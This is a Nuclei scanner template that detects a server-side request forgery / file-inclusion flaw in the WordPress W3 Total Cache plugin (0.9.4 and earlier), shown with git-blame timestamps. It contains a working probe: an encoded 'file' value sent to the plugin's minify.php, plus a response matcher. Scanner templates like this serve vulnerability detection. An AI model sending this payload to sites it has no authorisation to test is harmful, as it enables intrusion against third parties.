nuclei-templates/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml

19 lines
520 B
YAML
Raw Normal View History

2020-10-06 14:08:59 +00:00
id: w3c-total-cache-ssrf
2020-10-06 09:45:54 +00:00
info:
name: Wordpress W3C Total Cache SSRF <= 0.9.4
author: random-robbie
severity: medium
2020-10-06 14:08:59 +00:00
# Reference
# https://wpvulndb.com/vulnerabilities/8644
# https://klikki.fi/adv/w3_total_cache.html
2020-10-06 09:45:54 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'
matchers:
- type: word
words:
- "NessusFileIncludeTest"
2020-10-06 14:08:59 +00:00
part: body